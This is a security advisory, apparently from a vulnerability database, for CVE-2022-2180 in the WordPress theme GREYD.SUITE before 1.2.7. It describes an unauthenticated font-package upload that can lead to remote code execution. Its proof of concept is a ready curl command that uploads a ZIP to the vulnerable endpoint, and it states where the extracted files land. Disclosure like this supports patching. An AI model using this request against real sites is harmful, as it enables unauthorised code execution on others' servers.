GREYD.SUITE < 1.2.7 – Unauthenticated File Upload to RCE | CVE 2022-2180

Description

The plugin does not properly validate uploaded custom font packages, and does not perform any authorization or csrf checks, allowing an unauthenticated attacker to upload arbitrary files including php source files, leading to possible remote code execution (RCE).

Version 1.2.5 added CSRF checks

Proof of Concept

Send a POST requests against the wp-content/themes/greyd_suite/inc/customizer_ff.php file with some POST params and a ZIP file containing a CSS file and any other content:

curl --location --request POST 'https://theme-tests.docker.test/wp-content/themes/greyd_suite/inc/customizer_ff.php' \
--form 'mode="upload"' \
--form 'uploadpath="hackpath"' \
--form 'name_full="hackname"' \
--form 'file=@hack.zip;type=application/zip'

This will extract the files into wp-content/themes/greyd_suite/inc/hackpath/hack/ without any checks of the files included in the ZIP file.

From version 1.2.5, the uploaded files will be found in wp-content/uploads/greyd_tp/custom_fonts/hack/